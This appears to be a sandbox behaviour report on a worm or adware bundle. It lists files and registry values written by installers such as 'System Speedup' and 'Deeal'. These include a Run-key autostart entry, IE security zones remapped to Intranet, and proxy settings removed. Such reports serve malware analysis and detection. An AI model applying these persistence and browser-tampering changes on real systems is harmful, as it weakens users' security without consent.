%Program Files%\System Speedup\is-V0V6Q.tmp (61 bytes)
%Program Files%\System Speedup\is-NDBCG.tmp (3 bytes)
%Program Files%\System Speedup\is-JV4SN.tmp (601 bytes)
%Program Files%\System Speedup\is-0N5UM.tmp (601 bytes)
%Program Files%\System Speedup\is-TSUIR.tmp (601 bytes)
%Program Files%\System Speedup\is-4MQ25.tmp (2 bytes)
%Program Files%\System Speedup\is-IR05P.tmp (3 bytes)
%Documents and Settings%\All Users\Desktop\System Speedup.lnk (749 bytes)
%Program Files%\System Speedup\is-BPG1H.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\Register System Speedup.lnk (787 bytes)
%Program Files%\System Speedup\is-DRG9E.tmp (32429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_iscrypt.dll (2 bytes)
%Program Files%\System Speedup\unins000.msg (646 bytes)
%Program Files%\System Speedup\is-HO2II.tmp (601 bytes)
%Program Files%\System Speedup\is-VDBU7.tmp (673 bytes)
%Program Files%\System Speedup\is-T8KC2.tmp (3 bytes)
%Program Files%\System Speedup\is-501BS.tmp (601 bytes)
%Program Files%\System Speedup\is-MHLCB.tmp (601 bytes)
%Program Files%\System Speedup\is-NS6TN.tmp (601 bytes)
%Program Files%\System Speedup\is-T9SJP.tmp (601 bytes)
%Program Files%\System Speedup\is-IR0AU.tmp (2 bytes)
%Program Files%\System Speedup\is-RHE48.tmp (2 bytes)
%Program Files%\System Speedup\is-7MPU9.tmp (601 bytes)
%System%\roboot.exe (18 bytes)
%Program Files%\System Speedup\is-T5KNE.tmp (2 bytes)
%Program Files%\System Speedup\is-D56GU.tmp (673 bytes)
%Program Files%\System Speedup\is-L1VQG.tmp (3 bytes)
%Program Files%\System Speedup\is-KFTK7.tmp (48 bytes)
%Program Files%\System Speedup\is-GTE66.tmp (601 bytes)
%Program Files%\System Speedup\is-3KG25.tmp (3 bytes)
%Program Files%\System Speedup\is-PR38L.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\roboot.exe (18 bytes)
%Program Files%\System Speedup\is-FTDCJ.tmp (3 bytes)
%Program Files%\System Speedup\is-09HHR.tmp (2 bytes)
%Program Files%\System Speedup\is-N8TOS.tmp (601 bytes)
%Program Files%\System Speedup\is-IFID8.tmp (2 bytes)
%Program Files%\System Speedup\is-U1OSN.tmp (2 bytes)
%Program Files%\System Speedup\is-2GT1D.tmp (2 bytes)
%Program Files%\System Speedup\is-JKLDL.tmp (48 bytes)
%Program Files%\System Speedup\is-KP554.tmp (2 bytes)
%Program Files%\System Speedup\unins000.dat (17017 bytes)
%Program Files%\System Speedup\is-IN432.tmp (601 bytes)
%Program Files%\System Speedup\is-LTMNP.tmp (4185 bytes)
%Program Files%\System Speedup\is-89JAL.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\setup_en.bmp (3073 bytes)
%Program Files%\System Speedup\is-4UHHQ.tmp (3 bytes)
%Program Files%\System Speedup\is-5AJGM.tmp (2 bytes)
%Program Files%\System Speedup\is-ICS2N.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\Uninstall System Speedup.lnk (736 bytes)
%Program Files%\System Speedup\is-6MF3B.tmp (58396 bytes)
%Program Files%\System Speedup\is-Q8GAJ.tmp (34 bytes)
%Program Files%\System Speedup\is-CG9E5.tmp (3361 bytes)
%Program Files%\System Speedup\is-J4BHD.tmp (601 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_iscrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\setup_en.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp\roboot.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-RK62M.tmp (0 bytes)
The process aspsetup.tmp:4036 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Program Files%\ASP\is-UA9SK.tmp (2 bytes)
%Program Files%\ASP\is-BJHMB.tmp (2 bytes)
%Program Files%\ASP\is-6N8DK.tmp (49054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\sasnative32.exe (17 bytes)
%Program Files%\ASP\is-JSF5L.tmp (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\ASP\Troubleshooter\is-61J5L.tmp (1168 bytes)
%Program Files%\ASP\is-NG89P.tmp (2 bytes)
%Program Files%\ASP\is-RMKAH.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\isxdl.dll (673 bytes)
%Program Files%\ASP\is-CD24S.tmp (601 bytes)
%Program Files%\ASP\is-A22MS.tmp (2 bytes)
%Program Files%\ASP\Troubleshooter\is-D45A2.tmp (673 bytes)
%Program Files%\ASP\Troubleshooter\is-267G5.tmp (1168 bytes)
%Program Files%\ASP\Troubleshooter\is-MT9JH.tmp (35 bytes)
%Documents and Settings%\All Users\Desktop\Advanced System Protector.lnk (716 bytes)
%Program Files%\ASP\is-5AQQK.tmp (6841 bytes)
%Program Files%\ASP\is-5NG2P.tmp (1281 bytes)
%Program Files%\ASP\clamunpack\is-CNFR2.tmp (3361 bytes)
%Program Files%\ASP\is-I338K.tmp (49 bytes)
%Program Files%\ASP\is-1NP20.tmp (601 bytes)
%Program Files%\ASP\is-Q4HHA.tmp (11518 bytes)
%Program Files%\ASP\Troubleshooter\is-7HA9P.tmp (1168 bytes)
%Program Files%\ASP\clamunpack\is-P9O6O.tmp (535 bytes)
%Program Files%\ASP\is-RI07C.tmp (3 bytes)
%Program Files%\ASP\is-LIPEF.tmp (601 bytes)
%Program Files%\ASP\is-7PL0F.tmp (673 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\ssd\is-5MQH6.tmp (4185 bytes)
%Program Files%\ASP\is-U199G.tmp (3 bytes)
%Program Files%\ASP\is-JN7RH.tmp (4545 bytes)
%Program Files%\ASP\unins000.msg (302 bytes)
%Program Files%\ASP\is-ROED6.tmp (2 bytes)
%Program Files%\ASP\is-10429.tmp (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_iscrypt.dll (2 bytes)
%Program Files%\ASP\is-SMSNF.tmp (601 bytes)
%Program Files%\ASP\is-LU070.tmp (601 bytes)
%Documents and Settings%\All Users\Application Data\Systweak\ASP\is-VD0F9.tmp (24 bytes)
%Program Files%\ASP\is-5U10G.tmp (42 bytes)
%Program Files%\ASP\is-05Q7E.tmp (2105 bytes)
%Program Files%\ASP\is-9FUDH.tmp (601 bytes)
%Program Files%\ASP\is-6Q7OJ.tmp (64 bytes)
%Program Files%\ASP\is-UCTCU.tmp (3 bytes)
%Program Files%\ASP\is-4244J.tmp (3 bytes)
%System%\sasnative32.exe (17 bytes)
%Program Files%\ASP\is-7HG45.tmp (601 bytes)
%Program Files%\ASP\is-KHIO8.tmp (3073 bytes)
%Program Files%\ASP\is-H6M9V.tmp (601 bytes)
%Program Files%\ASP\is-VM1O4.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Register Advanced System Protector.lnk (754 bytes)
%Program Files%\ASP\is-F0R0S.tmp (2 bytes)
%Program Files%\ASP\is-G38PR.tmp (2 bytes)
%Program Files%\ASP\is-0Q9I8.tmp (65 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Advanced System Protector Trouble Shooter.lnk (854 bytes)
%Program Files%\ASP\is-9EH5C.tmp (32233 bytes)
%Program Files%\ASP\is-OGJ58.tmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Systweak\ASP\is-52RSK.tmp (13 bytes)
%Program Files%\ASP\is-CUUIB.tmp (20536 bytes)
%Program Files%\ASP\Troubleshooter\iexplore.lnk (717 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Uninstall Advanced System Protector.lnk (653 bytes)
%Program Files%\ASP\is-QM3EH.tmp (3 bytes)
%Program Files%\ASP\is-F6NPP.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Advanced System Protector\Advanced System Protector.lnk (728 bytes)
%Program Files%\ASP\is-SF545.tmp (2 bytes)
%Program Files%\ASP\is-VAO47.tmp (601 bytes)
%Program Files%\ASP\is-2K659.tmp (2 bytes)
%Program Files%\ASP\Troubleshooter\is-0HN3G.tmp (1168 bytes)
%Program Files%\ASP\is-PJF0P.tmp (601 bytes)
%Program Files%\ASP\is-C33I5.tmp (2 bytes)
%Program Files%\ASP\unins000.dat (28681 bytes)
%Program Files%\ASP\is-983A0.tmp (5 bytes)
%Program Files%\ASP\is-0RM7F.tmp (2 bytes)
%Program Files%\ASP\is-QCQ5I.tmp (2 bytes)
%Program Files%\ASP\is-M4CM8.tmp (51 bytes)
%Program Files%\ASP\clamunpack\is-3TNOV.tmp (15 bytes)
%Program Files%\ASP\is-E7U3G.tmp (601 bytes)
%Program Files%\ASP\is-JJL0N.tmp (27632 bytes)
%Program Files%\ASP\is-GM5PP.tmp (3 bytes)
%Program Files%\ASP\is-IHC3A.tmp (65 bytes)
%Program Files%\ASP\Troubleshooter\is-80F1G.tmp (1168 bytes)
%Program Files%\ASP\is-7FHI0.tmp (601 bytes)
%Program Files%\ASP\is-I7EIF.tmp (3361 bytes)
%Program Files%\ASP\is-191Q5.tmp (53 bytes)
%Program Files%\ASP\is-SQ7C1.tmp (673 bytes)
%Program Files%\ASP\is-HAFFC.tmp (3 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\sasnative32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\isxdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-UQB5P.tmp\_isetup\_iscrypt.dll (0 bytes)
The process rightbackupsetup.exe:3220 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-DONBT.tmp\rightbackupsetup.tmp (7386 bytes)
The process Reporter.exe:2608 makes changes in the file system.
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\report[1].gif (0 bytes)
The process Reporter.exe:3008 makes changes in the file system.
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\report[1].gif (0 bytes)
The process ~ahwapkv.exe:1512 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (3391 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\btdal_4.exe (212781 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_lastExecuted (10 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (2219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUoffer[1].params (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\conf[1].txt (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\conf[1].txt (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\SL1BK[1].htm (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\mypcbackupSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\data.ini (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\myapp_update_1.exe (22548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mypcbackup[1].exe (84617 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\new_conf.ini (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thxbetadeeal_install[1].htm (185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\mypcbackupSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\app[1].exe (211105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\win-app_update_3.exe (55924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getCaping[2].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_winUparams.ini (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\current_conf.ini (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\r_new_conf.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\conf[1].txt (283 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\base_conf.ini (108 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\SL1BK[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\btdal_4.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\mypcbackup[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\win-app_update_3.exe (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\conf[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\myapp_update_1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\current_conf.ini (0 bytes)
Registry activity
The process systweakasp.tmp:3164 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 49 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\ASP]
"aspsetup.exe" = "Advanced System Protector"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 B2 76 C4 78 D3 E9 06 1D BD 66 37 5E 93 26 6D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\rightbackup]
"rightbackupsetup.exe" = "Right Backup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SystweakASP" = "%Program Files%\RegClean Pro\SystweakASP.exe /verysilent"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process install.exe:1768 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 75 82 69 7B EF 0D 1E 58 8B C4 48 A5 18 5E 7F"
The process ~ssqyvbc.exe:2532 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 8C 37 4B A6 1E 6B AB 20 E0 16 A7 62 92 DF 0B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process ping.exe:664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 70 9D D8 0E 7C 37 5B F8 BA 20 43 46 E6 FD 40"
The process vcredist_x86.exe:1516 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 92 EE F8 15 58 DA 64 AF 74 D1 3C 62 C4 98 B2"
The process systweakasp.exe:3000 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F5 B4 6A 64 35 BD 22 74 AB A8 FA B9 1A 2F 58"
The process schtasks.exe:3420 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 15 F4 CD 1A C9 AB 03 0D A3 14 82 8F 35 4A 43"
The process schtasks.exe:1376 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 3F 22 FE 29 DC 62 2E B5 55 DD 73 6F C8 9F A8"
The process schtasks.exe:452 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B7 DB BC D4 59 C4 6C 73 BA 39 AD 33 2D B7 B3"
The process schtasks.exe:1156 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 C7 77 09 DB C2 5C 85 65 3A 4B AD DA F8 2B C6"
The process schtasks.exe:460 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 0A 6A 59 E8 51 73 CC 4D B5 37 71 6C 58 44 10"
The process schtasks.exe:1736 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 97 4B C9 DF E2 AF 42 B7 BD 73 37 E4 C6 EF FB"
The process schtasks.exe:416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 FC A0 17 95 19 06 98 DA BB 30 4A 83 A3 84 70"
The process schtasks.exe:1952 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 15 8B 9E 5D AD 87 43 02 80 DE 80 61 D9 DE C5"
The process schtasks.exe:1248 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 E8 9F C7 B6 67 2B EA 7A 20 E6 18 84 26 7C E7"
The process schtasks.exe:188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 5B B3 B3 C8 BE 88 19 CE B3 73 52 68 B1 68 FA"
The process schtasks.exe:1004 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D A4 AD 26 CC 8F 58 15 1F 44 F7 39 AC 58 F3 DC"
The process btdal_4.exe:3492 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\uninstall_Deeal.exe"
"DisplayName" = "Deeal"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 4B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Deeal]
"Chrome" = "False"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Deeal]
"Firefox" = "False"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"DisplayVersion" = "1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Deeal]
"Installed" = "True"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"InstallDate" = "13/08/2014"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"Publisher" = "Kreapixel inc."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"_Temp_cccwmay.tmp/Deeal.exe" = "Deeal"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"UninstallString" = "%Documents and Settings%\All Users\Application Data\uninstall_Deeal.exe -source=winU"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
